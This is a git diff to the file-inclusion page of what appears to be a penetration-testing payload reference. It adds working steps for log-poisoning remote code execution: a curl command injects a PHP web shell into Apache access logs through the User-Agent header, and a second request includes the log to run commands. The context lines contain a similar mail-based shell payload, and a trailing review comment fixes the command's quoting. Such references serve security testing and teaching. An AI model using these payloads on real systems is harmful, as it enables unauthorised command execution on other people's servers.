diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 8bb0a16..cc4a67f 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line. mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null ``` +### RCE via Apache logs + +Poison the User-Agent in access logs: + +``` +$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>" +``` + +Note: The logs will escape double quotes so use single quotes for strings in the PHP payload. + +Then request the logs via the LFI and execute your command. + +``` +$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id +``` + ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID)
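Review bot: the second example command has a shell-quoting defect: the URL `http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id` is unquoted, so the `&` is parsed by the shell as a background operator and `cmd=id` never reaches the request; wrap the URL in single quotes (e.g. `$ curl 'http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id'`). The heading level is also inconsistent with its siblings: `### RCE via Apache logs` nests under the preceding mail section, while the next section is `## LFI to RCE via PHP sessions`, so this should be a `##` heading. Finally, the note about escaped double quotes would read better if it stated the precondition explicitly (the log file must be readable by the web server user and the path differs by distribution), since the example hard-codes `/var/log/apache2/access.log`.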